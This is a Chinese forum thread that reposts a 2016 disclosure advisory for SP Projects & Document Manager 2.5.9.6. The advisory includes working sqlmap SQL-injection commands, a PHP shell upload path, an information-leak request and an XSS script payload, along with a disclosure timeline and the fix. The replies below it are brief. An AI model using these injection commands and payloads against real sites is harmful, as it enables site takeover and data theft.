请选择 进入手机版 | 继续访问电脑版
查看: 2885|回复: 7

WordPress的SP项目与文档管理器2.5.9.6 XSS / SQL注入

[复制链接]
  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2016-3-9 10:43:01 | 显示全部楼层 |阅读模式
    本帖最后由 人=族 于 2016-3-10 10:26 编辑

    * Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
    * Discovery Date: 2016/01/13
    * Public Disclosure Date: 2016/03/06
    * Exploit Author: Michael Helwig
    * Contact: https://twitter.com/c0dmtr1x
    * Vendor Homepage: http://smartypantsplugins.com/
    * Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
    * Version: 2.5.9.6
    * Tested on: WordPress 4.4.1
    * Category: webapps

    Description
    ===============================================================================

    The Wordpress plugin "SP Projects & Document Manager" contains several
    vulnerabilities: arbitrary file upload and code execution by registered users,
    sql injections, information leakage and xss by unregistered users.

    PoC
    ===============================================================================


    1. SQL-Injections
    ~~~~~~~~~~~~~~~~~~~

    Several SQL injections have been known in version 2.4.1 but have been fixed in between.
    At least two of them reappeared in version 2.5.9.6:

    - The injections in the "id"-parameter on
    http://wordpress.local.de/wp-con ... ment-manager/admin/
    ajax.php?function=download-project&id=1

    - and the POST-Parameter vendor_email on
    http://wordpress.local.de/wp-con ... ment-manager/admin/
    ajax.php?function=email-vendor

    See https://packetstormsecurity.com/files/129212/\
    WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
    for the original information on this.

    Both injections can be exploited by sqlmap:

    [1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
    -manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

    [2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
    -manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
    OR (1=1 *" --dbms mysql



    2. Arbitrary code executions
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
    request to their specific location in the default upload path (which can vary
    depending on the configuration of the plugin). The URL to uploaded files typically
    looks like

    /wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

    eg
    http://wordpress.local.de/wp-con ... nt-document-manager\
    /1/shell.php

    Files can even be accessed directly if the option "Require Login to Download"
    is checked in the plugin configuration.


    3. Information leakage
    ~~~~~~~~~~~~~~~~~~~~~~~

    Information about uploaded files can be retrieved by non-logged in users via a
    call to admin/ajax.php:

    -----------------------
    GET http://wordpress.local.de/wp-con ... nt-document-manager\
    /admin/ajax.php?function=get-file-info&id=1

    -- response --
    200 OK
    Date: Wed, 13 Jan 2016 22:17:46 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.14
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 211
    Connection: close
    Content-Type: application/json

    {"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
    "cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
    "form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
    ---------------

    Specifically you can retrieve info about the upload user id and filename
    to determine the URL for direct access to the file (see 3).

    4. XSS Vulnerability
    ~~~~~~~~~~~~~~~~~~~~~~~

    There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
    for function=email-vendor:

    ---------------
    POST http://wordpress.local.de/wp-con ... nt-document-manager\
    /admin/ajax.php?function=email-vendor
    Content-Type: application/x-www-form-urlencoded
    vendor_email[]=1&vendor=<script>alert(1);</script>

    -- response --
    200 OK
    Date: Sun, 06 Mar 2016 10:00:30 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.14
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 101
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    <p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
    </script></p>
    ---------------


    Timeline
    ===============================================================================

    2016/01/13 - Issues discovered
    2016/01/14 - Issues reported to vendor via contact form on his website
    2016/01/27 - No response from vendor; WordPress security team notified
    2016/01/29 - Reply from Wordpress security team
    2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed


    Solution
    ===============================================================================

    Update to latest version
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-7-27 10:04
  • 签到天数: 123 天

    [LV.7]常住居民III

    发表于 2016-3-9 10:50:02 | 显示全部楼层
    看下是什么
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-2-7 13:38
  • 签到天数: 124 天

    [LV.7]常住居民III

    发表于 2016-3-9 11:38:45 | 显示全部楼层
    看下是什么
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-11-2 23:21
  • 签到天数: 220 天

    [LV.7]常住居民III

    发表于 2016-3-9 13:49:30 | 显示全部楼层
    又是wordpress看看是什么
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2020-9-14 23:06
  • 签到天数: 537 天

    [LV.9]以坛为家II

    发表于 2016-3-9 14:11:48 | 显示全部楼层
    wordpress
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-10-10 18:06
  • 签到天数: 201 天

    [LV.7]常住居民III

    发表于 2016-3-9 14:57:13 | 显示全部楼层
    学习一下。。。。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-3-20 16:47
  • 签到天数: 18 天

    [LV.4]偶尔看看III

    发表于 2016-3-9 16:37:07 | 显示全部楼层
    中国红客,千秋万代!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2019-10-17 06:41
  • 签到天数: 182 天

    [LV.7]常住居民III

    发表于 2016-3-9 20:42:48 | 显示全部楼层
    又要回复,,
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表